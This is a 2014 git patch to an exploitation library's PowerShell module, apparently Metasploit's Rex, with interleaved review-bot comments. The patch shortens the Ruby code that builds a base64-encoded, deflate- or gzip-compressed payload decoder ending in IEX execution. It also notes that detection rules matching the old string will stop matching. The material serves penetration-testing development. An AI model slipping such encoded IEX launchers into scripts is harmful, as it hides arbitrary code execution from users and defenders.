From 86cfecdd9500ae31eef843b429a72c12d5f7a681 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 22 Apr 2014 14:52:30 +0100
Subject: [PATCH] Shave some chars off compression code
---
 lib/rex/exploitation/powershell.rb | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index afb9e7d588..8c3229e935 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -43,17 +43,17 @@ module Powershell
 # Build the powershell expression
 # Decode base64 encoded command and create a stream object
 psh_expression = "$s=New-Object IO.MemoryStream(,"
- psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+ psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
 # Read & delete the first two bytes due to incompatibility with MS
 psh_expression << "$s.ReadByte();"
 psh_expression << "$s.ReadByte();"
 # Uncompress and invoke the expression (execute)
- psh_expression << "$(IEX $(New-Object IO.StreamReader("
- psh_expression << "$(New-Object IO.Compression.DeflateStream("
+ psh_expression << "IEX (New-Object IO.StreamReader("
+ psh_expression << "New-Object IO.Compression.DeflateStream("
 psh_expression << "$s,"
 # [IO.Compression.CompressionMode]::Decompress = 0
- psh_expression << "0))"
- psh_expression << ")).ReadToEnd());"
+ psh_expression << "0)"
+ psh_expression << ")).ReadToEnd();"
 # If eof is set, add a marker to signify end of code output
 #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
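Review bot: The rewritten fragments `"0)"` and `")).ReadToEnd();"` only close correctly once every `<<` piece is joined, and the diffstat shows no spec changing alongside them, so a miscounted parenthesis would surface only when the generated script is executed. An example asserting the assembled string, or a comment above the block spelling out the joined tail, e.g. `# => IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($s,0))).ReadToEnd();`, would make the balance checkable at review time. The same applies to the GzipStream hunk at line 83. Anything that matches the old `$(IEX $(New-Object` literal, such as a spec or a script-block-log rule, will stop matching after this change. The enclosing method starts and ends outside both hunks, so existing coverage elsewhere cannot be ruled out from here.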
@@ -83,14 +83,14 @@ module Powershell
 # Build the powershell expression
 # Decode base64 encoded command and create a stream object
 psh_expression = "$s=New-Object IO.MemoryStream(,"
- psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+ psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
 # Uncompress and invoke the expression (execute)
- psh_expression << "$(IEX $(New-Object IO.StreamReader("
- psh_expression << "$(New-Object IO.Compression.GzipStream("
+ psh_expression << "IEX (New-Object IO.StreamReader("
+ psh_expression << "New-Object IO.Compression.GzipStream("
 psh_expression << "$s,"
 # [IO.Compression.CompressionMode]::Decompress = 0
- psh_expression << "0))"
- psh_expression << ")).ReadToEnd());"
+ psh_expression << "0)"
+ psh_expression << ")).ReadToEnd();"
 # If eof is set, add a marker to signify end of code output
 #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
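Review bot: No comment says why this GzipStream variant hands `$s` straight to the decompressor while the DeflateStream variant in the first hunk first discards two bytes with `$s.ReadByte();`. A line above `# Uncompress and invoke the expression (execute)` such as `# No header skip needed: GzipStream parses the gzip header itself` would record the difference. The two bytes discarded in the other variant are presumably the zlib header, which .NET's DeflateStream does not accept, though the compression side is outside this diff. The enclosing method begins and ends outside the hunk.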